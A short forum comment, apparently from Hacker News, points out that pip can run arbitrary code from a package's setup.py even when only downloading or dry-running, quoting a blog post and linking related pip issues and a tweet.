[chisquared]

> even package managers like pip

This reminds me of a blog post [1] I read before. Pertinent quote:

> Unbeknownst to me, even with --dry-run pip will execute arbitrary code found in the package's setup.py. In fact, merely asking pip to download a package can execute arbitrary code (see pip issues 7325 [2] and 1884 [3] for more details)!

Also seen on Twitter [4].

[1] https://moyix.blogspot.com/2022/09/someones-been-messing-wit...

[2] https://github.com/pypa/pip/issues/7325

[3] https://github.com/pypa/pip/issues/1884

[4] https://twitter.com/moyix/status/1566561433898426368